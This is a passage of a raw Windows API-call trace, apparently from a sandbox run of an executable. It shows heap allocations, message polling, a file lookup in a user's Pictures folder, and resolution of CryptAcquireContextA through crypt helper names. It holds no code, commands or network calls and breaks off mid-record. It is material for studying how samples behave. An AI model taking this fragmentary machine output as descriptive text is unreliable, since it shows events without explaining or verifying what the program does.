hHeap=0x970000) returned 1 [0247.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0247.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.261] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/abBnrhJwU.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76cde0e0, ftCreationTime.dwHighDateTime=0x1d5ee61, ftLastAccessTime.dwLowDateTime=0x92196850, ftLastAccessTime.dwHighDateTime=0x1d5ede5, ftLastWriteTime.dwLowDateTime=0x92196850, ftLastWriteTime.dwHighDateTime=0x1d5ede5, nFileSizeHigh=0x0, nFileSizeLow=0x17863, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="abBnrhJwU.gif", cAlternateFileName="ABBNRH~1.GIF")) returned 0xa87310 [0247.262] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0247.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.267] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0247.267] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0247.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.268] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0247.268] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.268] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0247.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0247.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0247.270] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0247.270] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.270] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0247.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0247.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0247.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0247.271] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b28 [0247.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.271] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0247.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0247.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0247.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0247.272] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0247.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.275] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0247.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 